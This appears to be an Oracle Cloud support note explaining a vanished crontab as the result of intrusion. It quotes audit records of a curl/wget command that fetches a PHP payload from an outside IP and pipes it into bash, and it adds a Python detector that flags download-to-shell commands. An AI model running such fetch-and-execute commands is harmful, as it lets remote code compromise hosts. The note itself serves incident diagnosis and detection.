OCI: Manually created crontab missing
Applies To:
Oracle Cloud Infrastructure - Version N/A and later
Linux x86-64
Symptoms:
Running the command “crontab -l” displays no output, even though a crontab was created.
$ crontab -l
Cause:
The audit logs have captured a “curl” from an unknown source:
type=PROCTITLE msg=audit(01/01/2024 19:29:16.964:10576723) : proctitle=/bin/sh -c (curl -k -s http://164.177.71.215/mobile/oebs.php||wget -qO- http://164.177.71.215/mobile/oebs.php)|bash
type=PATH msg=audit(01/01/2024 19:29:16.964:10576723) : item=1 name=/lib64/ld-linux-x86-64.so.2 inode=67520595 dev=08:03 mode=file,755 ouid=root ogid=root rdev=00:00 obj=system_u:object_r:ld_so_t:s0 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(01/01/2024 19:29:16.964:10576723) : item=0 name=/bin/sh inode=1854242 dev=08:03 mode=file,755 ouid=root ogid=root rdev=00:00 obj=system_u:object_r:shell_exec_t:s0 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(01/01/2024 19:29:16.964:10576723) : cwd=/u02/PROD/fs2/FMW_Home/user_projects/domains/EBS_domain
type=EXECVE msg=audit(01/01/2024 19:29:16.964:10576723) : argc=3 a0=/bin/sh a1=-c a2=(curl -k -s http://164.177.71.215/mobile/oebs.php||wget -qO- http://164.177.71.215/mobile/oebs.php)|bash
type=SYSCALL msg=audit(01/01/2024 19:29:16.964:10576723) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x7f874d913900 a1=0x7f874da6f010 a2=0x7ffebffe4f38 a3=0x379 items=2 ppid=7592 pid=17427 auid=unknown(12345) uid=unknown(12345) gid=unknown(12234) euid=unknown(12345) suid=unknown(12345) fsuid=unknown(12345) egid=unknown(12234) sgid=unknown(12234) fsgid=unknown(12234) tty=(none) ses=2365 comm=sh exe=/usr/bin/bash subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=all_cmds
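To find other occurrences of the same pattern in the audit trail, the records can be grouped by event id and the EXECVE arguments checked for a download piped into a shell. The following is an added example, not part of the original note; it assumes records in the interpreted layout shown in the event above, the function names are hypothetical, and the sample records are constructed.

```python
import re

# Header of an interpreted record: type, timestamp, event id, then the fields.
RECORD = re.compile(r"^type=(\w+) msg=audit\((.+?):(\d+)\) : (.*)$")
# curl/wget followed by a single pipe (not ||) into a shell interpreter.
FETCH_TO_SHELL = re.compile(r"\b(?:curl|wget)\b.*(?<!\|)\|(?!\|)\s*(?:ba|da|z|k)?sh\b")

def parse_events(lines):
    """Group the records that share an event id into one dict per event."""
    events = {}
    for line in lines:
        m = RECORD.match(line.strip())
        if not m:
            continue
        rtype, ts, eid, body = m.groups()
        ev = events.setdefault(eid, {})
        ev["time"] = ts
        if rtype == "EXECVE":
            # Argument values may contain spaces: split only before the next aN= key.
            parts = re.split(r"\s(?=a\d+=)", body)
            ev["argv"] = [p.split("=", 1)[1] for p in parts if re.match(r"a\d+=", p)]
        elif rtype == "CWD":
            ev["cwd"] = body.split("cwd=", 1)[1]
        elif rtype == "SYSCALL":
            ev.update(re.findall(r"\b(uid|ppid|pid|exe)=(\S+)", body))
    return events

def find_fetch_to_shell(lines):
    """Return one summary per execve event whose command pipes a download into a shell."""
    hits = []
    for eid, ev in parse_events(lines).items():
        cmd = " ".join(ev.get("argv", []))
        if FETCH_TO_SHELL.search(cmd):
            hits.append({"event": eid, "time": ev["time"], "uid": ev.get("uid"),
                         "ppid": ev.get("ppid"), "cwd": ev.get("cwd"), "command": cmd})
    return hits

# Constructed sample records (documentation address 192.0.2.10, made-up ids and paths).
SAMPLE = """\
type=EXECVE msg=audit(01/01/2024 10:00:00.100:501) : argc=3 a0=/bin/sh a1=-c a2=(curl -k -s http://192.0.2.10/a.sh||wget -qO- http://192.0.2.10/a.sh)|bash
type=CWD msg=audit(01/01/2024 10:00:00.100:501) : cwd=/srv/app/domain
type=SYSCALL msg=audit(01/01/2024 10:00:00.100:501) : arch=x86_64 syscall=execve success=yes exit=0 ppid=4100 pid=4200 auid=unset uid=appuser euid=appuser comm=sh exe=/usr/bin/bash key=all_cmds
type=EXECVE msg=audit(01/01/2024 10:05:00.200:502) : argc=3 a0=curl a1=-s a2=http://192.0.2.10/health
type=SYSCALL msg=audit(01/01/2024 10:05:00.200:502) : arch=x86_64 syscall=execve success=yes exit=0 ppid=4100 pid=4300 auid=unset uid=appuser euid=appuser comm=curl exe=/usr/bin/curl key=all_cmds
""".splitlines()

if __name__ == "__main__":
    for hit in find_fetch_to_shell(SAMPLE):
        print(hit)
```

The cwd and ppid in each hit point to the parent process that launched the shell, which in the event above is running from the EBS_domain directory.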